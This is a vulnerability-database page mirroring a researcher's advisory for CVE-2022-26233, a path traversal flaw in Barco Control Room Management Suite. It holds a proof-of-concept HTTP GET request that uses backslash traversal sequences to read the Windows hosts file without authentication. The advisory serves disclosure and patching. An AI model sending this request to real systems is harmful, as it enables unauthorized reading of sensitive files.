Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Barco Control Room Management Suite Directory Traversal

🗓️ 04 Apr 2022 00:00:00Reported by Murat AydemirType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 358 Views

Barco Control Room Management Suite File Path Traversal Vulnerability CVE-2022-26233 Murat Aydemir Accenture Cyber Securit

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Barco Control Room Management Suite Directory Traversal Vulnerability
6 Apr 202200:00
zdt
FreeBSD		chromium -- multiple vulnerabilities
2 Aug 202200:00
freebsd
ATTACKERKB		CVE-2022-26233
3 Apr 202223:15
attackerkb
ATTACKERKB		CVE-2022-2623
12 Aug 202220:15
attackerkb
Information Security Automation		Microsoft Patch Tuesday August 2022: DogWalk, Exchange EOPs, 13 potentially dangerous, 2 funny, 3 mysterious vulnerabilities
23 Aug 202200:00
avleonov
Circl		CVE-2022-2623
29 Aug 202220:46
circl
Circl		CVE-2022-26233
4 Apr 202202:27
circl
CNNVD		Barco Control Room 路径遍历漏洞
3 Apr 202200:00
cnnvd
CNNVD		Google Chrome 竞争条件问题漏洞
4 Apr 202200:00
cnnvd
CVE		CVE-2022-2623
12 Aug 202219:37
cve
Rows per page
`*I. SUMMARY*  
Title: [CVE-2022-2623] Barco Control Room Management Suite File Path  
Traversal Vulnerability  
Product: Barco Control Room Management Suite before 2.9 build 0275 and all  
prior versions  
Vulnerability Type: File Path Traversal  
Credit by/Researcher: Murat Aydemir from Accenture Cyber Security Team  
(Prague CFC)  
Contact: https://twitter.com/mrtydmr75  
Github: https://github.com/murataydemir  
  
*II. CVE REFERENCE, CVSS SCORES & VULNERABILITY TYPES*  
CVE Number: CVE-2022-26233  
CVSSv3: Base score: 7.5 Impact 3.6 Exploitability: 3.9  
CVSSv3 Vector: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)  
Vulnerability Type: File Path Traversal  
CWE ID: CWE-22 Improper Limitation of a Pathname to a Restricted Directory  
('Path Traversal')  
  
*III. PROOF OF CONCEPT (POC) FOR CVE-2022-26233*  
Due to lack of input sanitizing inputs which come from url, an application  
is vulnerable to file path traversal vulnerability. A succesfully  
exploitation of this vulnerability could lead to access/read files and  
directories stored on file system including application source code or  
configuration and critical system files. No authentication is required to  
exploit this vulnerability. An attacker who is not logged into the  
application can easily exploit this vulnerability.  
  
GET /..\..\..\..\..\..\..\..\..\..\windows\System32\drivers\etc\hosts  
HTTP/1.1  
Host: vulnerablehost  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0)  
Gecko/20100101 Firefox/81.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Connection: close  
  
[image: file-path-traversal.PNG]  
  
*IV. REFERENCE(S)*  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26233  
https://nvd.nist.gov/vuln/detail/CVE-2022-26233  
https://www.barco.com/en/support/knowledge-base/kb115*XX*  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Apr 2022 00:00Current
8.2High risk
Vulners AI Score8.2
EPSS0.70035
barco control room management suitefile path traversalcve-2022-26233murat aydemiraccenture cyber securitypath traversalvulnerabilitydirectory traversalcwe-22input sanitizing
358